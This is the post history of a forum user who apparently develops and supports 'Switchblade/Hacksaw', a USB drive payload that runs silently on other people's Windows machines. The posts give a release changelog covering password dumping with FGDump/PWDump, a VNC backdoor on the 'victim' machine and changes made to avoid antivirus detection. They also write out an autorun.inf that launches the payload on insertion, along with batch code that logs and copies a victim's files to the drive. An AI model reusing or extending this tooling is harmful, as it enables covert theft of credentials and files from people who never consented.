
GonZor

Everything posted by GonZor

  1. Sounds like a good idea, I may incorporate this into the next release depending on the feedback.
  2. Finally out of beta: The long awaited V2.0 is now out of beta, sorry for the delay.

     What's New:

       • Restructured the payload and rewritten half the code (reduced size)
       • Fixed VNC (confirmed working - new password is "easy")
       • Added the option to use either FGDump or PWDump (or both)
       • Rewritten the search function in VBS, hopefully fixed the "no disk error"
       • Changed the way the files are named, now named as - "%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%]"
       • Updated several parts so they are now undetected by most AV, to the best of my knowledge most AVs will only detect sbs.exe (part of the Hacksaw)

     * Please note for VNC to work you must have the correct ports forwarded on the "victim's" router and firewall and such...

     I can't think of any other updates, though I may have forgotten some.

     Also for those looking for a non-U3 version I have a temporary solution, follow the simple instructions below...

       1. Extract the ISO to the root of your flash drive.
       2. Edit the AUTORUN.INF
       3. Run SBConfig from your flash drive.

     * Please note the U3 menu system will not function on a non-U3 drive but the payload will work fine (don't enable the U3 menu in SBConfig and you will be fine)

     * If you don't know how to make your own autorun.inf, use the following code

         [autorun]
         action=Enable USB Flash Drive
         open=wscript go.vbs

     As usual any feedback is welcome, please let me know if you are still encountering the no disk error. I have rewritten the search function in VBS and this should get rid of the problem but I may be wrong and have no way of testing.

     Thanks and once again sorry about the delays.

     EDIT: As usual Linky In my Sig
  3. I'm glad I can help, I'm surprised what I write actually makes sense to someone other than me.

     -------------------

     If you open up a cmd and type "set" this will display a list of variables set on your machine. A lot of them will be Windows variables, but some may be specific to your machine. The Windows variables are the ones that become useful when doing something like this. After you take a quick look at this list you will notice two things wrong with the following line.

         file.exe /A:C "%homepath%%username%Desktop*.jpg" "%fd%Documents%computername%Pictures" /I /P

     Firstly, I gave you the wrong variable :-( The %homepath% variable expands to Documents and Settings%username%. You will notice that this doesn't have a drive letter, so it will only work if run from the partition where Windows is installed. If we were to use the %homepath% variable we would need to use the %homedrive% variable before it, like so: %homedrive%%homepath%. When expanded this would look something like this: C:Documents and Settings%username%. When you look at the variable list you may have noticed the %userprofile% variable, which would expand to the same as %homedrive%%homepath%, so we should have been using the %userprofile% variable, sorry about that.

     Secondly, I'm sure you have already figured this one out after reading that, the %homepath% variable (like the %userprofile% variable) expands to Documents and Settings%username%, therefore when used like you have, "%homepath%%username%", it will expand to Documents and Settings%username%%username% and as you can see wouldn't work.

     The solution: replace the %homepath% variable with the %userprofile% variable and take out the %username% variable. Each line should now look something like this.

         file.exe /A:C "%userprofile%Desktop*.jpg" "%fd%Documents%computername%Pictures" /I /P

     My suggestion is to use SciTE (Scintilla Text Editor). It has syntax highlighting and also has a window to view the output of the code (that does not disappear).

     If you want a screenshot to explain what I mean I will upload one later, but for now I'm off to Wendy's :P
  4. -----------------------------

     I'll apologise now to all those people whose questions I have not had time to answer, I have been really busy recently. I will try to release V2.0 tomorrow if time permits. If I have missed your question I'm sorry and please PM me, you may not be the only person who wants to know.

     -----------------------------

     This has been annoying me quite a bit. From what we can tell the error is caused by having a card reader. I don't have a card reader so I have never experienced this error first hand, and there have been several parts of the story that vary for each person, so it is very difficult to figure out EXACTLY what is causing this error. It shouldn't have anything to do with netpass since it happens when it is disabled (unless you are saying netpass runs even when it is meant to be disabled).

     The HakSaw should actually work now without having to wait until the next time you log on. Let me know if it isn't, because it works for me, so I will have to test that.

     No problem, just giving back what I can.

     I feel so stupid. This is why we should learn to read properly...

     * GonZor slaps self

     There is no "%Documents and Settings%" variable, assuming your <source> now looks like this

         "C:Documents and Settings%username%My Documents*.jpg"

     The "%homepath%" variable will expand to what you want, hence the <source> could be rewritten as this, which is better in case they have Windows installed on another partition.

         "%homepath%My Documents*.jpg"

     Unfortunately some of the tools are detected by certain AV, I was unaware of Trend Micro detecting fgdump and cachedump. It's odd that it allowed those tools to dump the information, you should look at your AV settings and change them to deny access for these programs.

     -----------------------------

     Are you Mark Frederickson? If so please PM me ASAP.

     -----------------------------
  5. -- Received demonoid invite from Cosmo many thanks. Once I have some invites I will share
  6. It's a command line tool, it doesn't have a GUI. Read the parameters in the first post...
  7. Easiest way to silently install something is to make an MSI
  8. Sorry if this makes no sense at all, just got home from a party. I'll try to explain each line individually.

         :: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED
         FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (

     FOR %variable IN (set) DO <command>

       • %variable specifies a single letter variable (my chosen variable %%i)
       • (set) specifies what the variable will be each time (in this case the alphabet)
       • <command> specifies the command to do with each variable in the set (in this case I used an open bracket just for readability)

         :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC
         IF EXIST %%i:SystemSRCdrv.dat (

     The first command for each variable, IF EXIST <file> <command>

       • <file> specifies the file to search for (in this case we are searching for the file SystemSRCdrv.dat but this can be changed to any file)
       • <command> specifies the command to do if the file exists (once again I used an open bracket for readability, I find it easier)

         SET fd=%%i:SystemSRC

     This is the command to be completed once the file is found to exist, SET <variable>=<string>

       • <variable> specifies the variable that we will later call on to expand into the string (in this case the variable is fd and is later called as %fd%)
       • <string> specifies what we want the variable to expand to when it is called (in this case we want it to expand to the drive letter & the folder path SystemSRC)

         )
         )

     These are just the closing brackets to both statements, first closing the IF EXIST command and second closing the FOR command. This could be written as one line but for readability I use the brackets.

     I hope that made sense but time now for some sleep :shock:
  9. NOD32 detects the usual (dialupass.exe, pspv.exe). I'm assuming the only difference between your "tools" and other payloads is you have used the most recent versions? (eg mailpv.exe)
  10. Depending on whether the user has saved the password this COULD be retrieved through either lsa secrets, IE password or Firefox password. As far as I know there is no special way that a myspace password is saved, maybe myspace IM saves it somewhere?? I don't know I've never used it.
  11. What were you thinking of installing?
  12. To be honest I have never used file.exe so I am unfamiliar with how it's used, but looking at your code, I am going to assume the last three lines should look like this:

         file.exe /A:C "%Documents and Settings%%username%My Documents*.jpg" "%fd%Documents%computername%Pictures" /I /P
         file.exe /A:C "%Documents and Settings%%username%My Documents*.bmp" "%fd%Documents%computername%Pictures" /I /P
         file.exe /A:C "%Documents and Settings%%username%My Documents*.gif" "%fd%Documents%computername%Pictures" /I /P

     Assuming the syntax is file.exe /A:C <source> <destination> /I /P, this should work fine now. The problem was you were saying the destination was on the CD partition (which you obviously can't write to, a CDFS partition).
  13. Personally I use both, the main reason as pointed out by oligarchy314: Although when you have a number of apps organization is a must and pstart is better for that.
  14. In certain situations you'll notice I do use " in pairs, and ultimately they end up being used in pairs anyway. Generally if I am setting a folder path I will use a single " at the beginning, but if I am setting a path to a file I will enclose it in " marks (I know that makes no sense but you will have to forgive me, I have had no sleep)

         SET include="G:SRCInclude
         IF EXIST %include%0.dat"

     When the second line is expanded it will look like this

         "G:SRCInclude0.dat"

     Note the " on either end. If I were to enclose each in " like so

         SET include="G:SRCInclude"
         IF EXIST "%include%0.dat"

     When the second line is expanded it will look like this, and fail

         ""G:SRCInclude"0.dat"

     To simplify my code I could get away without using any " for this situation but it is just a habit I have picked up.

     Sorry about the rough quick explanation, if it doesn't make sense I can attempt another explanation after I've had some sleep.

     I'd love to take a look at the tweaks you've made, as well as the executable. What language?
  15. The Law

     By deploy do you mean distribute (as in the way the switchblade/hacksaw has been amongst the community) or use maliciously (using the switchblade/hacksaw in an unauthorized situation)
  16. You need to detect where the flash partition is mapped. Looking at my go.bat you will notice that I have done this by searching for a dat file which is on the flash partition. Normally you will need to create the file manually but SBConfig.exe does this for you when you use my payload.

         :: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED
         FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
             IF EXIST %%i:NUL.EXT (
                 :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC
                 IF EXIST %%i:SystemSRCdrv.dat (
                     SET fd=%%i:System
                 )
             )
         )

         :: CREATE LOG DIRECTORY
         IF NOT EXIST %fd%Logs%computername% (
             MD %fd%Logs%computername%
         )

         :: COUNT NUMBER OF PREVIOUS LOGS FROM THIS COMPUTER SO THAT WE DO NOT OVERWRITE A LOG
         DIR /a-d /s "%fd%Logs%computername%" | FIND /c ".log" > "%fd%SRC###"
         SET /p count=<"%fd%SRC###"

         :: SET LOG PATH
         SET log="%fd%Logs%computername%%computername%-[%count%].log"

     Create a file on your flash partition SystemSRCdrv.dat. Place that at the top of your go.bat, now when you refer to your log file use %log%, this will expand to X:SystemLogs%computername%%computername%-[%count%].log where X is the flash drive letter and count is the amount of logs for that computer in the folder.
  17. True crypt isn't the be-all end-all solution, for the reasons specified below... A lot of the tools used in the payload (specifically the ones that get detected by AV) need an admin account to work, I would create a combination of true crypt and rar.
  18. As long as I'm not a penguin it's OK by me :P Just remember /? is your friend, some of the explanations are very basic but most of them are quite useful
  19. You were missing the quotes from around your destination, it should have read

         copy "H:WIPCMDVirtuMem.exe" "C:Documents and SettingsAll UsersStart MenuProgramsStartup" /y

     Notice the quotes around the source and destination paths. I didn't need them around the source because there are no spaces but I do it anyway. I also added a /y switch to copy the file even if it exists (just to make sure it's your file, not a dummy file).
  20. Which part? Reading through the thread there is a lot of information here.
  21. The "sniffer" is possible, I made something similar a while back and then just used sniffpass to filter the raw packets. The problem is the need to silently install WinPcap. I don't like the idea of key loggers and I don't think I will be adding one to my payload.
  22. First of all check out my payload, take a look at SRCgo.bat in the ISO. Have you considered how you are going to make this customizable? Take a look at how my payload works, because you won't be able to comment out parts of the payload you don't want on a CDFS partition. If you need any help just ask. If you want an explanation of any of my payload just ask, I haven't commented go.bat very well
  23. I remember a while back people were complaining about the karma because we couldn't tell who gave who karma and why... I don't know if you ever found a suitable mod but when I was looking for mods for my forums I found this http://custom.simplemachines.org/mods/index.php?mod=192 I've installed it and it seems to work really well. You can allow as much or as little information as you like about the karma given.
  24. That was my first opinion but it is much more entertaining when you're sleep deprived, although everything is entertaining when you're sleep deprived.